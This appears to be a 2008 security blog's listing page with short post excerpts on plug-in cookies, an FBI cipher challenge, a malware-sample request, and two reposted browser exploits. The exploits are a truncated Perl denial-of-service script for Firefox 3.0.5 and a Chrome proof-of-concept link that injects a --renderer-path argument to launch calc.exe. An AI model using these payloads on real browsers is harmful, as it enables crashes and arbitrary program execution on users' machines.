Watch out for hidden cookies

Wednesday, December 31st, 2008

By now, most of us are aware of the potential privacy risks posed by Web cookies. But according to a new paper published by security consultancy iSec Partners, traditional browser-based cookies aren't the only technology used to store user data anymore. A number of browser plug-ins offer similar capabilities -- ...

FBI issues code cracking challenge

Monday, December 29th, 2008

The FBI today challenged anyone in the online community to break a cipher code on its site.  The code was created by FBI cryptanalysts. The bureau invited hackers to a similar code-cracking challenge last year and got tens of thousands of responses it said. A number of sites host such cipher ...

Malware Request

Sunday, December 28th, 2008

I am looking to do some analysis on various pieces of malware.  Please forward me some of your junk and any questionable attachments that you may get in your Inbox.  This will be private analysis so please do not expect to hear anything back about what you send. Please send to: [email protected] Thanks, Troy

Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit

Tuesday, December 23rd, 2008

#!/usr/bin/perl # mzff_lhash_dos.pl # Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit # Jeremy Brown [[email protected]/jbrownsec.blogspot.com] # Crash on Vista, play with it on XP $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 <filename.html>\n\n"; } $head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n"; $trig = "location.hash = \"" . "A" x 20000000 . "\";" ...

Google Chrome Remote Parameter Injection

Tuesday, December 23rd, 2008

Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc Original url: http://retrogod.altervista.org/9sg_chrome.html click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a> Source: http://www.milw0rm.com/exploits/7566